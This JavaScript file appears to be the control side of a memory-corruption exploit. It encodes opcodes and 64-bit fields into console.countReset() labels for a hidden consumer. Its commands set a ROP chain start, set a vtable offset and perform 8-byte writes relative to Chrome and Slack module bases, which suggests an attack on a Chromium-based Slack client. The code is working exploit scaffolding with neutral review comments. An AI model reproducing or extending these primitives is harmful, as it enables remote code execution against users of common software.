// Command opcodes for the control() channel. control() serializes the opcode
// as the first 16 hex digits of the label it passes to console.countReset();
// any arguments follow as further 16-hex-digit fields, so a complete label is
// 16, 32 or 48 hex characters long depending on the command.
// NOTE(review): what each command actually does is decided by whatever parses
// those labels; that consumer is not part of this file, so the per-command
// notes below describe only the wire layout visible here.
const CMD_SET_ROP_START = 0; // set_rop_start(addr): opcode + 1 field
const CMD_SET_OFFSET_VTABLE = 1; // set_offset_vtable(offset): opcode + 1 field
const CMD_WRITE8 = 2; // write8(offset, val): opcode + 2 fields
const CMD_WRITE8_CHROME_BASE_PLUS_VALUE = 3; // write8_chrome_base_plus_val(offset, val): opcode + 2 fields
const CMD_WRITE8_SLACK_BASE_PLUS_VALUE = 4; // write8_slack_base_plus_val(offset, val): opcode + 2 fields
const CMD_WRITE8_SLACK_BASE_ALIGNED = 5; // write8_slack_base_aligned(offset): opcode + 1 field
const CMD_START = 6; // start(): opcode only, no argument fields
/**
 * Format a value as a fixed-width, 16-character lowercase hex string.
 *
 * The value is converted with BigInt(), rendered in base 16, left-padded
 * with zeros and then cut to its last 16 characters.
 *
 * Caveats a caller should know about:
 *  - Values wider than 64 bits are silently truncated to their low 16 hex
 *    digits; nothing is reported.
 *  - Negative values keep the "-" sign that BigInt#toString emits, so the
 *    result is not a valid hex field (e.g. -255 yields "0000000000000-ff").
 *  - Non-integer Numbers make BigInt() throw a RangeError.
 *
 * @param {number|bigint|string} num - Any value BigInt() accepts.
 * @returns {string} Exactly 16 characters.
 */
function int64(num) {
  const hexDigits = BigInt(num).toString(16);
  return hexDigits.padStart(16, "0").slice(-16);
}
/**
 * Emit one command on the console.countReset() channel.
 *
 * The label handed to console.countReset() is the opcode rendered by
 * int64() (16 hex characters) followed directly by `arg`. No separator or
 * length prefix is added, and `arg` is not validated here, so the label is
 * only well-formed if the caller passes already-encoded 16-digit fields.
 *
 * NOTE(review): console.countReset() is used purely as a carrier for the
 * label string; the component that reads and interprets these labels is not
 * visible in this file.
 *
 * @param {number} cmd - One of the CMD_* opcodes.
 * @param {string} [arg=""] - Pre-encoded argument fields appended to the opcode.
 * @returns {void}
 */
function control(cmd, arg = "") {
  console.countReset(int64(cmd) + arg);
}
/**
 * Send CMD_SET_ROP_START with a single 16-hex-digit field.
 *
 * @param {number|bigint|string} addr - Value encoded with int64(); see that
 *   function for truncation and negative-number caveats.
 * @returns {void}
 */
function set_rop_start(addr) {
  const addrField = int64(addr);
  control(CMD_SET_ROP_START, addrField);
}
/**
 * Send CMD_SET_OFFSET_VTABLE with a single 16-hex-digit field.
 *
 * @param {number|bigint|string} offset - Value encoded with int64(); see
 *   that function for truncation and negative-number caveats.
 * @returns {void}
 */
function set_offset_vtable(offset) {
  const offsetField = int64(offset);
  control(CMD_SET_OFFSET_VTABLE, offsetField);
}
/**
 * Send CMD_WRITE8 with two 16-hex-digit fields: `offset` first, then `val`.
 *
 * @param {number|bigint|string} offset - First field, encoded with int64().
 * @param {number|bigint|string} val - Second field, encoded with int64().
 * @returns {void}
 */
function write8(offset, val) {
  const payload = `${int64(offset)}${int64(val)}`;
  control(CMD_WRITE8, payload);
}
/**
 * Send CMD_WRITE8_CHROME_BASE_PLUS_VALUE with two 16-hex-digit fields:
 * `offset` first, then `val`.
 *
 * NOTE(review): the name suggests the consumer adds a module base to `val`
 * before using it; that happens outside this file, so confirm against the
 * receiver.
 *
 * @param {number|bigint|string} offset - First field, encoded with int64().
 * @param {number|bigint|string} val - Second field, encoded with int64().
 * @returns {void}
 */
function write8_chrome_base_plus_val(offset, val) {
  const payload = `${int64(offset)}${int64(val)}`;
  control(CMD_WRITE8_CHROME_BASE_PLUS_VALUE, payload);
}
/**
 * Send CMD_WRITE8_SLACK_BASE_PLUS_VALUE with two 16-hex-digit fields:
 * `offset` first, then `val`.
 *
 * NOTE(review): how the consumer combines `val` with a base address is not
 * visible in this file; confirm against the receiver.
 *
 * @param {number|bigint|string} offset - First field, encoded with int64().
 * @param {number|bigint|string} val - Second field, encoded with int64().
 * @returns {void}
 */
function write8_slack_base_plus_val(offset, val) {
  const payload = `${int64(offset)}${int64(val)}`;
  control(CMD_WRITE8_SLACK_BASE_PLUS_VALUE, payload);
}
/**
 * Send CMD_WRITE8_SLACK_BASE_ALIGNED with a single 16-hex-digit field.
 *
 * Unlike the other write8* helpers this one carries no value field; whatever
 * is written is chosen by the consumer, which is not shown here.
 *
 * @param {number|bigint|string} offset - Value encoded with int64().
 * @returns {void}
 */
function write8_slack_base_aligned(offset) {
  const offsetField = int64(offset);
  control(CMD_WRITE8_SLACK_BASE_ALIGNED, offsetField);
}
/**
 * Send CMD_START with no argument fields, so the emitted label is the
 * 16-hex-digit opcode alone.
 *
 * @returns {void}
 */
function start() {
  // The empty string is control()'s own default, spelled out here.
  control(CMD_START, "");
}